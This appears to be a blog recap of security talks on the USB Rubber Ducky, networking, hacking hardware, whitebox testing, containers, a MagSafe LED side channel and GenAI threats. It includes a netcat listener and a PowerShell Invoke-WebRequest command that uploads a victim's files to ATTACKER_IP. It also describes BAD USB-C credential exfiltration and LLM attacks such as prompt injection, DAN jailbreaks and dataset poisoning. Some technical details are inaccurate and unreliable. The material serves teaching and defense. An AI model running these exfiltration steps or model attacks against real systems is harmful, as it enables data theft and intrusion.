A tester can program the Rubber Ducky to open a command prompt, disable defenses, install a backdoor and exfiltrate passwords. When plugged into an unlocked PC, the device completes the entire sequence in seconds without any visible alerts. This combination of hardware impersonation and scripting enables the Rubber Ducky to effectively bypass many conventional security measures,Because the host sees it as a trusted keyboard and the payload is precompiled for precise timing, endpoint protections that rely on simple device checks or delayed behavioral analysis often fail to catch it that narrow execution window and the device’s low footprint make detection difficult.

For those reasons, strict USB device policies, endpoint controls that validate device identity and targeted user awareness training are important countermeasures.

Inside the Rubber Ducky

• Microcontroller: Acts as the brain of the device, interpreting and executing encoded payload files stored on the microSD. Mostly Atmel’s 32-bit AVR microcontroller, specifically the AT32UC3B1256

• MicroSD Card: Holds the payload (script) in binary format. The script must be written in DuckyScript, then compiled into a format the microcontroller understands

• USB Interface: Lets the device physically connect to and communicate with the target computer, presenting itself as an keyboard

What Leads It to Mimic a Keyboard?

The Rubber Ducky tricks the computer into thinking it's a real keyboard by using a special microcontroller programmed with USB descriptors set to the keyboard class. When plugged in, the microcontroller provides these descriptors.

Descriptors: USB descriptors are a specific example of the general idea of a descriptor: they’re small metadata structures that tell the host what a USB device is and how to communicate with it (device type, vendor/product IDs, configurations, interfaces, endpoints, supported protocols, etc.).

In general, a descriptor describes a resource (files, devices, sockets, memory) by providing the metadata the system needs to use that resource.so the OS loads generic keyboard drivers and instantly trusts it as safe input without requiring user approval.

Once accepted, the Rubber Ducky rapidly injects keystroke commands using preloaded scripts, exploiting the universal trust placed in keyboards by computers and bypassing restrictions applied to normal USB drives or storage devices. The attack is fast, automated and works because most operating systems are designed to automatically trust and use any connected HID device like a legitimate keyboard.

What are USB Descriptors?

A USB descriptor is a structured set of data embedded in every USB device that tells a host computer what the device is, how it should be used and what resources it needs. When a USB device like the Rubber Ducky is plugged in, the computer reads these descriptors during a process called enumeration to decide how to interact with that device.

How USB Descriptors Work

• When the device connects, the host requests descriptor data to identify and configure the device.

• Descriptor Types:

  • Device Descriptor: General info about the device (USB version, Vendor ID, Product ID, device class)

  • Configuration Descriptor: Power needs and the number of available interfaces

  • Interface Descriptor: Describes each function of the device (e.g., identifying as a keyboard via its HID class)

  • Endpoint Descriptor: Specifies communication channels (like input or output endpoints)

  • String Descriptor: Optional, provides human-readable info (product name, manufacturer)

  • Role in Device Recognition: The device descriptor and interface descriptor (especially with the correct USB class code for a keyboard — HID: 0x03) cause the computer’s OS to identify and trust the device as a keyboard automatically.

Example: Device Descriptor Structure

Note: This is vibe coded and only for learning purposes

typedef struct USB_DEVICE_DESCRIPTOR myHIDKeyboard = {
    .bLength = 0x12,
    .bDescriptorType = 0x01,
    .bcdUSB = 0x0200,
    .bDeviceClass = 0x03, // This sets HID class
    .bDeviceSubClass = 0x01, // Boot interface
    .bDeviceProtocol = 0x01, // Keyboard
    .bMaxPacketSize0 = 0x40,
    .idVendor = 0x1234,
    .idProduct = 0x5678,
    .bcdDevice = 0x0100,
    .iManufacturer = 0x01,
    .iProduct = 0x02,
    .iSerialNumber = 0x00,
    .bNumConfigurations = 0x01
} USB_DEVICE_DESCRIPTOR;

bDeviceClass set to 0x03 means HID (keyboard/mouse class). If you change bDeviceClass to 0x08 (Mass Storage), the descriptor makes the OS mount it as a USB drive and use storage-specific actions.

• idVendor and idProduct are unique identifiers for the manufacturer and device.

Key Functions

• Identification: Allows OS to load the correct drivers automatically.

• Power Management: Informs host of device power needs.

• Security and Control: The OS uses these to apply any whitelisting/blacklisting or security policies.

Why It Matters for Rubber Ducky:
The magic that allows the Rubber Ducky to impersonate a keyboard lies in something called USB descriptors. The Rubber Ducky uses custom firmware to set its descriptors, claiming to be a standard USB keyboard. Because of these descriptors, the OS trusts it as a legitimate input device without special permission, even though it is programmed to inject malicious keystrokes.

These descriptors including device/class identifiers, vendor/product IDs, and HID report descriptors cause the host to load keyboard drivers and accept input immediately, allowing the precompiled payload to run stealthily as soon as the device is attached.

In summary, USB descriptors are critical metadata tables programmed into a device’s firmware that define how a host system recognizes, configures and communicates with the device.

Scripting Languages for Rubber Ducky

The coding of a Rubber Ducky device involves two main parts: the DuckyScript payload (written by the user) and the firmware on the microcontroller that reads the payload and injects keystrokes.

Steps

1. Write the script and save as inject.txt.

2. Use DuckEncoder tool to convert inject.txt to inject.bin.

3. Upload inject.bin on the Rubber Ducky.

The .bin file (usually named inject.bin) is a binary file that contains the encoded commands for the Rubber Ducky to execute. This format is necessary because the Rubber Ducky’s microcontroller cannot read plain text; it only understands binary instructions converted from DuckyScript.

It encodes precise HID scancodes and timing into a compact format so keystrokes execute reliably and quickly across different systems.The .bin file is placed on the device, which reads and injects the encoded keystrokes when plugged in, automating the attack.

Scripting Language

The language used for writing commands and payloads for the Rubber Ducky is called DuckyScript. DuckyScript is a simple scripting language designed specifically for the Rubber Ducky to automate keystroke injection and keyboard actions. Designed to be human‑readable, it uses concise commands and timing directives so scripts map directly to keyboard actions

Each line in a DuckyScript file represents a command (like STRING, ENTER, GUI r, etc.), which the device processes and types as if it were a real keyboard.

Typical Usage

• Use a plain text editor to write your DuckyScript payload (commands).

• Use a converter tool (like DuckEncoder) to convert your .txt script into a .bin file (inject.bin).

• Use an SD card reader to copy the inject.bin file onto the microSD card for the Rubber Ducky.

• Insert the SD card into the device; when plugged into the target computer, the Rubber Ducky will execute the payload.

Keep payloads simple: use directives like DELAY, DEFAULT_DELAY, REPEAT, and REM; account for keyboard-layout and OS differences; test in a VM or lab, and only run scripts where you have explicit permission.

Hello World Example in DuckyScript

# Payload Hello World
# A payload for testing the USB Rubber Ducky’s functionality to display text Hello World!
# Script Starts below
DELAY 3000
GUI r
DELAY 500
STRING notepad
DELAY 500
ENTER
DELAY 750
STRING Hello World!
ENTER
# Script Ends above

Explanation

• DELAY 3000: Waits for 3 seconds before starting, giving the OS time to recognize the device

• GUI r: Presses Windows logo key + r, opening the Run dialog

• DELAY 500: Waits 0.5 seconds

• STRING notepad: Types "notepad" in the Run box

• DELAY 500: Waits 0.5 seconds

• ENTER: Hits enter, opening Notepad

• DELAY 750: Waits 0.75 secons for Notepad to open

• STRING Hello World!: Types "Hello World!" in Notepad

• ENTER: Press Enter to go to a new line

Setting up a data collection server

A server will be running on the attacker’s machine and the victim’s machine using the script injected by Rubber Ducky will connect to the attacker's IP address and exfiltrate the files.

Key Points:

• The server's IP address and port number must be included in the Rubber Ducky payload/script so the victim knows where to upload or transfer the files.

• For example:

  • In a PowerShell or CMD command, the script will reference http://ATTACKER_IP:PORT or the relevant FTP address.

• This way, once the Ducky runs, the victim's machine initiates the outbound connection and the attacker's server receives the data

# Netcat (TCP Listener)
nc -lvnp 4444 > received_file.txt

Python HTTP Server

For browser/PowerShell POST/PUT uploads:

• Example code:

•   import http.server
    import socketserver
    import os
    import cgi
  
    # Configure port and upload directory
    PORT = 8000
    UPLOAD_DIR = os.path.join(os.getcwd(), 'uploads')
  
    class UploadHandler(http.server.BaseHTTPRequestHandler):
        # (Methods do_POST, do_PUT, handle_upload, and do_GET are defined here)
        pass
  
    if __name__ == "__main__":
        # (Server setup and startup code is here)
        pass
  

and run python3 simple_http_server.py 8080

Victim's command (PowerShell example):

Invoke-WebRequest -Uri http://ATTACKER_IP:8080/upload -Method PUT -InFile C:\path\

Conclusion

The USB Rubber Ducky, disguised as an ordinary flash drive, is a powerful tool that leverages computers' inherent trust in keyboards. With a simple DuckyScript payload and a microcontroller that emulates a keyboard over USB, it can execute attacks or automate tasks at superhuman speed. By presenting a USB with some device descriptors that identify it as a standard keyboard and sending precompiled report sequences (scancodes + timing), the host immediately accepts input without user prompts — so the payload runs instantly and reliably once plugged in.

For security researchers, it’s an invaluable tool for testing organizational defenses. For everyone else, it’s a sobering reminder of the importance of physical security and implementing strict device control policies. Never trust a USB device you don't know.

Resources:

These payload repositories and encoder tools can help you learn and build Rubber Ducky payloads. The payload repos show ready-made scripts and examples; the encoder tools convert Duckyscript into the .bin payloads the device uses. Only test on systems you own or where you have explicit permission.

Payload Repositories:

• https://github.com//usbrubberducky-payloads

• https://github.com/topics/ducky-payloads

• https://github.com/topics/-rubber-ducky

• https://github.com/topics/duckyscript

• https://github.com/topics/rubber-ducky

Encoder Tools:

• https://github.com/kevthehermit/DuckToolkit

• https://github.com/tresacton/DuckEncoder

• https://github.com/netscylla/Ducky-Encoder

• https://github.com/xp4xbox/Ducky-Encoder

• https://github.com/mame82/duckencoder.py

• https://schlomo.github.io/rubber-ducky-german/ (includes source code link on the page)

View the slide deck for this talk here

Evolution of communication systems

Marconi (wireless telegraphy) → One-way radio → Two-way radio (interactive comms) → Digital networks (Ethernet frames, VoIP, etc.)

• Guglielmo Marconi → credited with inventing wireless telegraphy (early radio), which was one-way communication (just sending signals).

• Later, radio tech evolved into two-way communication (walkie-talkies, mobile phones, etc.) where both ends could talk.

• Then we moved into digital communication → carrying not just analog voice but also data.

• Today, even voice calls are chopped into frames/packets (like Ethernet frames in computer networks) when sent over digital/VoIP systems.

OSI Layer

Physical Layer

• The Physical Layer (Layer 1) is responsible for transmitting raw bits over physical media.

• Supports various transmission media:

  • Wires/Cables: Copper (Ethernet CAT5/6/7), Coaxial

  • Optical Fiber: High-speed long-distance communication (up to 58 Gbps with Ethernet over fiber)

  • Radio Waves: Wireless transmission for WiFi, Bluetooth, and cellular networks.

• WiFi is actually Layer 2 (Data Link), but it relies on radio waves as the physical medium.

• Key protocols at Layer 1: IDE, SCSI, Ethernet physical specifications.

• Ethernet uses packet switching rather than circuit switching:

  • Packet switching sends data in discrete frames, making networks more flexible.

  • Circuit switching requires pre-allocated bandwidth for the duration of the communication, which is less efficient for shared networks.

• Layer 1 also defines electrical/optical signal standards, connector types, and transmission speeds

Data Link Layer

• The Data Link Layer (Layer 2) operates on top of the Physical Layer, ensuring devices can communicate reliably over physical media.

• Compatibility is crucial: Protocols are needed so devices from different manufacturers can exchange data.

• Standard Ethernet Frame: Encapsulates data for Layer 2 transmission.

• MAC Address (Media Access Control):

  • Needed to identify devices on the same network.

  • If only two devices are connected on a single cable, addresses aren’t required.

  • When networks scale beyond two devices, MAC addresses allow correct packet delivery.

  • Originally sufficient for small, room-scale networks; now critical for larger, multi-device environments.

• Address Management:

  • Managed at Layer 2 (MAC) and Layer 3 (IP).

  • DHCP on routers assigns IP addresses; devices cannot safely overwrite these without risk.

• Why not just MAC?

  • MAC addresses are not extensible beyond local networks.

  • They are hardware-burned, making replacement difficult.

  • IP addresses are required for network-wide routing and scalability.

• ARP Protocol (Address Resolution Protocol):

  • Maps IP addresses to MAC addresses for local communication.

  • Vulnerable to ARP spoofing and cache poisoning attacks.

• VLANs & Trunking:

  • Segment networks into isolated broadcast domains, enhancing security.

  • Misconfigurations can lead to attacks like VLAN hopping via switch spoofing or double tagging.

  • Tagged VLANs help prevent unauthorized access between segments.

  • ARP spoofing: Attackers send fake ARP replies to associate their MAC with a victim’s IP.

• MOII & MAC Security: MAC spoofing detection is used to enhance Layer 2 security.

Network Layer

• IP Addressing: Enables devices to communicate across different networks using IPv4 or IPv6.

• IPv4 vs IPv6:

  • IPv4 uses 32-bit addresses; IPv6 uses 128-bit, allowing vastly more unique addresses.

  • IP Classes organize IPv4 addresses for network segmentation.

• Documentation IP Blocks (RFC 5737):

  • 192.0.2.0/24 (TEST-NET-1)

  • 198.51.100.0/24 (TEST-NET-2)

  • 203.0.113.0/24 (TEST-NET-3)

  • Reserved for testing; not for production use.

• IPv6 Documentation Prefix: 2001:DB8::/32

  • A special IPv6 block reserved by the IETF (RFC 3849) for documentation, examples, and training.

  • Prevents misuse of real IPv6 addresses in books, blogs, and lab setups.

  • Avoids confusion, accidental traffic leaks, and security risks.

  • Non-routable; any traffic to this range is dropped by routers.

  • Recognized globally as a safe prefix for educational use.

  • Can be subnetted (e.g., 2001:DB8:1::/48) to model real-world configurations.

  • Similar to movie phone numbers starting with 555—looks authentic but never connects.

  • Ensures documentation is professional, consistent, and conflict-free.

  • Example addresses:

    • 2001:DB8:1234::1/64

    • 2001:DB8:abcd:5678::/64

• Private Addresses: 100.64.0.0 - 100.64.128.255 (used by ISPs and Tailscale; avoids collisions).

• DHCP Reservations:

  • Assign fixed IPs without relying on sequential allocation.

• Routing:

  • Direct tapping of Ethernet wires is expensive and impractical; port mirroring on destination devices is preferred.

  • Layer 2 MITM attacks are easier to detect; higher layers offer better protection.

  • Routing protocols: OSPF, BGP, ISIS (mostly for carrier networks).

    • Common Routing Attacks:

      • BGP: Prefix hijack, route leaks, manipulation

      • OSPF: LSA injection, falsification, evil twin, LSU spoofing

      • ISIS: Route spoofing, session hijacking

Transport Layer

• Protocols: TCP, UDP, and ICMP form the core of the Transport Layer.

• NAT (Network Address Translation):

  • Allows multiple devices to share a single public IP.

  • the purpose of NAT is to saves IPv4 addresses and hides internal network structure for security

  • Types: Static NAT, Dynamic NAT, PAT (NAT Overload), Port Address NAT.

• Packet Wrapping

  • TCP traffic can be encapsulated inside UDP packets for tunneling.

  • Reliability is still ensured through TCP sequencing and acknowledgments.

  • Useful when networks restrict or block certain protocols.

  • Enables communication to pass through firewalls, NAT devices, or strict network policies.

  • Common in VPNs and tunneling tools where flexibility and traversal of blocked paths are required.

Security & Protections:

• Maintain ACLs to control access.

• Change default ports to reduce attack surface.

• Use VPNs and tunneling to secure communication.

  • Packet Analysis:

• Tools: tcpdump with drivers like usbpcap and ncap capture interface packets for analysis.

  • Real-World Topologies:

• Designed for carrier gateways and high availability networks.

• For real carrier gateways & high availability infra networks

  • Ref: https://robert.penz.name/779/howto-setup-a-redundant-and-secure-bgp-fulltable-internet-connection-with-mikrotik-routers/
  • TCP Flags:

• PSH (Push): Packet must be processed immediately.

• URG (Urgent): Specifies high-priority packets

  • ICMP, Ping, and Traceroute:

• Used for error reporting, diagnostics, and status messages.

• Traceroute works by incrementing TTL to map the route to the destination.

WiFi Highlights

• WiFi operates at Layer 2 (Data Link), while radio waves act as the physical carrier medium at Layer 1.

• Security Protocols:

  • WPA2 (non-PKS versions) can potentially be decrypted if misconfigured.

  • RADIUS and other authentication protocols manage secure access.

Miscellaneous / Performance Highlights

• Ethernet Performance: CAT cables can support speeds up to 58 Gbps in optimal conditions.

• Data Flow: Every packet leaving a device enters the network for processing.

• Passive Wiretap: Operates at Layer 2 and can intercept traffic without detection, highlighting the importance of network security

The session ended at the Transport Layer, while the higher layers :- Session, Presentation, and Application were left out. These will be covered in Application Security (AppSec), keeping the focus here on core networking basics first

Hardware Arsenal

View the slide deck for this talk here

What is it?

• Hardware/Hacking Arsenal → Tools designed for specific protocols with compromise as the ultimate goal.

• Focus → How much can you breach without breaking cover?

• Uses → Military operations, physical red teaming, and fun research.

P4wnP1 A.L.O.A

• Turns Raspberry Pi Zero W / Pico W into a powerful, low-cost pentesting tool.

  (Reference:-https://www.raspberrypi.com/documentation/)

• Acts like a WiFi Rubber Ducky with HIDScript (DuckyScript-style payloads).

  (Refrence:-https://github.com/majdsassi/Pico-WIFI-Duck)

• Can emulate keyboard, mouse, storage, and more for red teaming & research.

Pwnagotchi

• AI-powered WiFi sniffer (A2C + bettercap) that learns from its environment.

• Captures WPA handshakes & PMKIDs (saved as PCAPs for hashcat)

• PMKID (Pairwise Master Key Identifier) is a unique value in WPA/WPA2 Wi-Fi that speeds up roaming but can also be captured for offline password cracking.

• A digital pet for hackers running on Raspberry Pi Zero W/2W, 3, and 4.

  (Refrence:-https://github.com/JakerHuber/Jakes-Pwnagotchi-Tutorial.git)

Flipper Zero

• Portable multi-tool for pentesters & hackers in a toy-like body.

• Hacks radio, access control, hardware, and more.

• Open-source & customisable with modular extensions.

PortaPack (for HackRF)

• Add-on with touchscreen, controls, SD slot, clock, and case.

• Turns HackRF into a portable spectrum explorer (few MHz – 6 GHz).

  (Refrence:-https://github.com/pavsa/hackrf-spectrum-analyzer.git)

• Runs on USB battery + proper antenna. (Can be misused for illegal activity)

Keyless Entry & Rolling Code

• Used in cars & garage doors for remote lock/unlock.

• Rolling Code: generates single-use passcodes so codes don’t repeat.

• Exploit angle → If the signal doesn’t reach the car, the sequence can be intercepted & abused.

USB-C

• 24-pin reversible connector, replacing older USB types.

• EU mandate:

  • Phones, tablets, cameras & headphones → by Dec 28, 2024

  • Laptops → by Apr 28, 2026

• Goal: One universal charger/cable.

BAD USB-C (Overview)

• ESP32 Pico-based USB-C implant for executing keystrokes.

• Can run scripts, payloads, admin/root commands.

• With WiFi onboard, it can even bypass air-gapped systems (requires physical access).

Example:

BAD USB-C is an ESP32 Pico-based implant disguised as a USB-C device. It behaves like a normal USB peripheral, but in reality, it executes automated keystrokes and connects over WiFi.

How It Works

1. Physical Access → Connect the BAD USB-C to the target computer.

2. Remote Control → Connect to the device from your laptop, VM, or even a smartphone hotspot.

3. Payload Execution → BAD USB-C injects keystrokes on the victim’s machine as if typed by a user.

Example Attack Scenario

• Prepare a payload script (PowerShell or Batch).

• BAD USB-C executes automatically once plugged in:

  • Opens Command Prompt or PowerShell.

  • Elevates to Administrator (via keystroke sequence).

  • Executes your script, e.g.:

    • Copies documents, credentials, or browser data.

    • Compresses them into a hidden archive.

    • Sends them back over WiFi.

Air-Gapped Bypass

An air-gapped system is normally secure because it’s isolated from any network. BAD USB-C, powered by ESP32 Pico with WiFi, can still bypass this protection.

1. Injects payloads via keystrokes (e.g., open CMD/PowerShell).

2. Collects files (docs, creds, logs).

3. Exfiltrates data over WiFi directly to the attacker’s device.

4. Stealth mode: BAD USB-C can connect to a hidden SSID (like a mobile hotspot) for operational security.

Example:-

• Plug BAD USB-C into an air-gapped PC → it runs a script to zip “.docx” files → connects to your hidden mobile hotspot → sends data over WiFi to your laptop.

• The air-gap is silently bypassed.Key point: Unlike normal USB-C, BAD USB-C is both injector and covert channel, making it far more dangerous.

The session showed a clear journey of how communication has evolved and how today’s networks work.

Along with this, the hardware segment showcased practical tools like P4wnP1, Pwnagotchi, Flipper Zero, and PortaPack, giving a glimpse into hardware hacking and security.

• Whitebox Warfare: Beyond Scanners, Beyond Bounties
  by Kaustubh Rai

• Container Security: A Build Your Own Adventure
  by Sumir Broota

Whitebox Warfare

TL;DR

• Green dashboards lie. “0 criticals” doesn’t mean safe.

• Whitebox isn’t “run SAST.” It’s architectural X-ray + action.

• Three high-leverage plays: Dependency Autopsy, Secrets Archaeology, Attack-Surface Mapping.

• Three ≤1-day defenses: Entropy-as-Code, Dependency Surgery, Honeytrap Logging.

Key Concepts:

Are we safe if the SAST Scan doesn’t detect vulnerabilities?

• Scanner says we are safe. So we are safe right?

• Vulnerabilities missed by SAST Scanners costs to companies both reputably or financially

• For example: A code snippet which decodes JWT Token is given below

    public static String getUsername(String token){
        try {
            DecodedJWT jwt = JWT.decode(token);
            return jwt.getClaim("username").asString();
        }
        catch (JWTDecodeException e){
            return null;
        }
    }
  

• In the above snippet, the method takes a JWT token, tries to decode it, and fetches the "username" field. If decoding fails, it returns null.

• However, this code only decodes the token; it does not verify the signature or check expiry, and therefore should not be used for authentication by itself. Such code can escape the scrutiny of SAST scanners, as they are often not focused on the nuances of authentication.

• The remediation is shown in the snippet below:

    DecodedJWT jwt = JWT.decode(token); 
    DecodedJWT jwt = JWT.require(Algorithm.HMAC256(secret)).build().verify(token);
  

• The first line just decodes the JWT without validation, while the second line verifies the token’s signature and integrity using the secret key.

• The above snippet validates the cryptographic signature, rejects altered tokens, enforces the algorithm parameter, and prevents none algorithm attacks.

• A Real World Example would be the below CVE:

  • Gitlab 2022 JWT Flaw - CVSS 9.9

    • https://about.gitlab.com/releases/2022/03/31/critical-security-release-gitlab-14-9-2-released

The Whitebox Lie → Whitebox Advantage

Reality:
Whitebox is architectural X-ray. Done right, it deletes bug classes (auth mistakes, parser traps, transitive risk) and speeds teams up by preventing redesigns later.

Attack Surface in White Box Testing

• As most new infrastructure relies on old technology buried deep within layers of libraries, a vulnerability in even one of those libraries can put the entire system at risk.

• The attack surface extends beyond what is visible to the human eye or to SAST scans. Here are ways to dig deeper into those hidden layers:

  • Dependency Autopsy: The process of analyzing and investigating software dependencies to uncover vulnerabilities, risks, or failures after an incident. Even if direct dependencies appear safe, a vulnerable package buried several layers deep (a dependency of a dependency) can serve as a hidden attack vector.

    • Run deep trees (npm ls --depth 10, language equivalents).

    • Flag packages with old release cadences, open vulns, or abandoned repos.

  • Dependency Surgery: The process of identifying, isolating, and removing vulnerable or unnecessary software dependencies to eliminate potential attack paths. This involves cutting out risky dependencies from the software stack to neutralize threats.

  • Secrets Archaeology: The practice of systematically uncovering hardcoded credentials, API keys, tokens, and other sensitive information hidden within source code, repositories, or configuration files, often buried deep in version history or dependencies.

    • Hunt with git log -S 'AKIA' (AWS) or org-specific patterns.

    • Automate in CI to alert + revoke.

Defenses in White Box Testing

• Entropy-as-Code → Ensure randomness/security features are programmatically enforced.

• Honeytrap Logging → Plant deceptive traces that alert you if someone is probing the system. eg: canary tokens

Core Techniques in White Box Testing

• Field Manipulation

  • Start by manipulating request parameters to attempt unauthorised actions.

  • Example: Modify JSON fields or inject extra parameters to bypass normal logic.

• Case Sensitivity Bypass

  • Test if changing the case of field names affects validation.

  • Example: AdminAction vs adminAction vs ADMINACTION.

• Parser Differentials

  • Check how different back-end services interpret conflicting input.

  • Example with multi-service architecture:

    • Go → Uses the last value of a repeated field (adminAction).

    • Python → Uses the first value (userAction).

  • Exploit the inconsistency to bypass authorization.

  • RFC 8259 allows duplicates; behavior is implementation-dependent. Many parsers keep the last value; some error; some keep all.

• Format Confusion

  • Send a request in a format that the system partially understands but misinterprets.

  • Example: Force a JSON response, but send a request in XML shaped like JSON.

  • Goal: Trigger parsing inconsistencies or bypass validation layers.

Operationalizing White Box

• Policy-as-code: Semgrep custom rules, CodeQL queries, IaC checks.

• Pipelines: Pre-commit hooks → PR checks → required status → nightly sweeps.

• Playbooks: Keep a repo of rules/queries and a “fix-once” mindset (when a bug appears, add a rule so it never returns).

Attack Chain in White Box Testing

• Scan the code base with rules (both default and custom rules).

• If a vulnerability is spotted, craft payloads for that vulnerability.

• If a defense is present, bypass the defense in the code base.

Container Security

What do Containers do?

• Isolation: Keeping Your Code Safe from Other Processes

• Portability: Moving Applications Across Platforms

• Allows Scalability: Handling Increased Demand

How Virtualization happens in Containers?

• Are Docker & Kubernetes the only type of containers?

  • No, there are many like podman, LXC, runc, containerd, BSD jail

• What separates them from VMs?

  • The fact that they share the host machines kernel

  • Containers are pure software virtualisation which allows faster boot

  • Any hardware device is virtualised in VM’s & they give dummy values

• How do docker containers create this separation?

  • Docker daemon → containerd runtime → runc (low level runtime) → namespaces

What are namespaces and cgroups?

• What are namespaces?

  • Namespace is a linux kernel feature that allows creating isolated views on the
    following types of resources (currently there are 8 types)

    • time

    • user

    • pid

    • mnt

    • net

    • ipc

    • uts

    • cgroups

  • Lets understand some of them:

    • time - Allows different namespaces to have separate boot and monotonic clocks, enabling time virtualization within containers

    • user - Isolates user and group IDs. A process can have root privileges in its user namespace but not in others

    • pid - Gives each namespace its own set of process IDs. Processes in one PID namespace can only see other processes in the same namespace

    • mnt - Oldest ns in linux allows different views of file hierarchy similar to chroot jails (but more secure)

    • net - Provides each namespace with its own network stack, including interfaces, IP addresses, routing tables, and firewall rules

    • ipc - Security oriented namespace - prevents unauth processes from accessing/destroying the inter process comm (ipc) via segregation

    • uts - Allows each namespace to have unique host and domain names (hostname isolation)

• What are cgroups?

  • They act like virtual "cages" for processes, enabling resource management and control by partitioning and restricting access to system resources such as CPU, memory, disk I/O, and network

What is the meaning of root in container?

• A container can have an internal root process but won’t be privileged without setting the --privileged flag

• For a Non Privileged Container

  • The processes in the container maps to normal user processes on the host machine, hence don’t have the privilege to perform many attacks

  • The root user within the container will be unable to mount host files into the container/load kernel modules

  • It is still recommended to run as non-root if your application doesn’t have a usecase for it. This reduces the risk of any kernel vulnerability from being abused & the container from being further compromised

Standard Container Breakout

• To understand the type of permissions once has, one can try

  • Installing packages into the container (possible if container root)

  • Check if the host file system is mounted to the containers, with privileged one should have write access to it

  • Running capsh --print to get all the container capabilties on the host machine listed

Dirty Pipe Container Breakout

• DirtyPipe vulnerability is a kernel level bug that allows a malicious user to write files to a read-only file system. When data is loaded in memory it is done so using pages.

• Using the PIPE_BUF_FLAG_CAN_MERGE pipe flag to a user can force their mal data into memory & use the splice syscall to write it to target destination.

Securing Your Containers

• Best Practices

  • Always use trusted images from verified sources

  • Ensure regular updates to maintain security

  • Conduct scanning for vulnerabilities consistently

• Additional Measures

  • Implement strict access controls for users

  • Utilize network segmentation for isolation

  • Monitor container activity for anomalies

• NaughtyMag: Making Macbook Blink Its Data Away
  by Adhokshaj Mishra

• Securing the Mind of Machines : GenAI Security & Trust Frameworks
  by Harsh Tandel

Naughty Mag

Overview:

• A side-channel attack that turns Apple’s MagSafe LED indicator into a data exfiltration device..

• What are Side Channel Attacks? Software can control LED status using SMC to indicate color change if battery over 80%

• The LED, usually meant to indicate charging status (amber/green), can be modulated to transmit data covertly

Key Concepts:

🔌 MagSafe Connection Points:

• Uses its own protocol

• Pinout:

  • Ground

  • Power

  • Adapter Sense

• 1-wire protocol: computer ↔ cable ↔ charger (powerbrick)

• All communicate with each other to negotiate power

• Also lets them control which connectors are manufacture supported

• Integrated Circuit DS24123: Can take command over 1-wire from Macbook and change LED status

⚠Note: The IC involved is not widely documented

How Control Works

• Charger Startup:

  • Charger provides very low current initially

  • Why negotiation works first - then fails

  • Initial creators - which created the ability to change MagSafe charger color.

    • https://apphousekitchen.com/aldente-overview/features/#control-magsafe-led

    • https://github.com/AppHouseKitchen/AlDente-Charge-Limiter

• Control of the MagSafe LED is software-driven, but routed through

  • The SMC (System Management Controller).

  • Can be manipulated using the SMC API, which documents key

    values for LED control.

• Attackers can:

  • Use software tools or custom scripts (several emerged from

    GitHub issues).

  • Leverage I/O Kit on macOS to interface with the hardware.

Exfiltration Method:

• LED controls can be toggled with precision:

• Requires:

  • Precise control of on/off timing

  • Understanding of data encoding methods

Encoding Challenges:

• Simple binary (e.g., 0000 or 1111) can lead to ambiguity in timing- based detection.

• Manchester Encoding may be needed to avoid repetition ambiguity

  

• Morse code is a viable fallback for slower but clearer data transmission.

  • Don't need rising/falling edge

  • only need steady state

  • New encoding to not be dependent on time

Limitations

• Color masking is not feasible (LED has limited colors).

• Can be detected via High-Security Monitoring (HSM).

• Could be made stealthier by tuning antenna properties of the wire (convert power cable into low-range antenna).

Counter Measures

• Channels require software side component

• Monitor end user devices

• Be aware of such potential attacks

Related Concepts:

• Read Morris Mano - Digital Electronics

• Why Manchester encoding can't work for discrete waves. Digital Electronics & Computer Architecture (background needed)

• macOS IOKit, SMC APIs

Securing the Mind of Machines

Talk covered the evolving threat landscape around Generative AI.

• The expanding attack surface of GenAI systems and MCP servers

• The MITRE ATLAS threat framework for AI

• OWASP Top 10 for LLMs

Key Points Discussed:

• Prompt Injection

• Data Poisoning & Model Leakage

• Jailbreaking via DAN-style prompts

• RAG (Retrieval-Augmented Generation) manipulation

Defense Techniques:

• Responsible AI and Secure AI frameworks (Google SAIF, NIST RMF)

• Guardrails, Meta Prompts, DSPM

• ISO standards for AI management (42001, 27563)

How red teamers can practice attacks against GenAI systems and what compliance & trust mechanisms are beginning to emerge in the field

This blog discusses the topics covered during the session.

Neural Network: A neural network is a deep learning technique designed to resemble the structure of the human brain. It requires large data sets to perform calculations and create outputs, which enables features like speech and vision recognition.

Natural Language Processing (NLP): A field of AI that enables computers to understand and generate human language.

Machine Learning (ML): A subset of AI that focuses on algorithms that can learn from data without explicit programming. Federated learning is a machine learning technique that allows multiple entities to collaboratively train a model without sharing their raw data.

Deep learning : Deep learning is a subset of machine learning that focuses on utilizing multilayered neural networks to perform tasks such as classification, regression, and representation learning.

Large Language Model (LLM): A type of AI model that is trained on large amounts of text data to generate human-like text.

Retrieval-Augmented Generation (RAG): It is a technique that enhances the accuracy and relevance of large language model (LLM) responses by integrating them with external knowledge sources.

Conventional AI: AI also known as narrow or weak AI, is designed for specialized tasks. Conventional AI relies heavily on data-driven processes, leveraging algorithms and ML techniques to perform tasks.

Agentic AI: Agentic AI refers to AI systems capable of autonomous action, decision-making, and adaptation without constant human supervision

Generative AI(Gen AI): AI that can generate new content like text, images, or code.below is the basic architecture of typical Gen AI.

Why Gen AI Security ?

● Everyone is using Gen AI to create arts, make decisions, enhance their side projects. Every firm is rushing to integrate AI in their products and systems. It is making it crucial to consider it’s security. AI Models and MCP Servers expand the new attack surface, vulnerabilities beyond traditional codes.

● The generative AI market is experiencing rapid growth, with a projected market size of $66.89 billion in 2025 and a forecasted compound annual growth rate (CAGR) of 36.99% between 2025 and 2031, leading to a market volume of $442.07 billion by 2031.

● A study by Menlo Security showed that 55% of inputs to generative AI tools contain sensitive or personally identifiable information (PII), and found a recent increase of 80% in uploads of files to generative AI tools, which raises the risk of private data exposure.

● Gartner Press Release, “Gartner Predicts 40% of AI Data Breaches Will Arise from Cross-Border GenAI Misuse by 2027,” February 17, 2025.

● Generative AI (GenAI) red teaming is crucial for identifying and mitigating vulnerabilities in AI systems before they can be exploited by malicious actors. By simulating attacks and adversarial scenarios, it helps strengthen the security and reliability of AI models, ensuring they are robust and trustworthy.

MITRE ATLAS - Adversarial Threat Landscape for AI Systems

Reconnaissance : We will search and gather details about model’s architecture, code repository,API and genesis model documentations.We will scan the it’s MCP server, code, Client facing interface and APIs.

Resource Development : For devlopment of the payload we will check the ML artifacts, sample dataset and prompt if available, create account or access demo or UAT and based on that craft the prompts, publish malicious dataset, hallucinated entities/entries that can be fetched by MCP server and sent by RAG.

Initial Access : Hardware or software like MLOps platforms, data& model management software, GPU Hardware, Model hubs that is used in AI systems might be compromised or misconfigured. Other way is creating account into AI model.

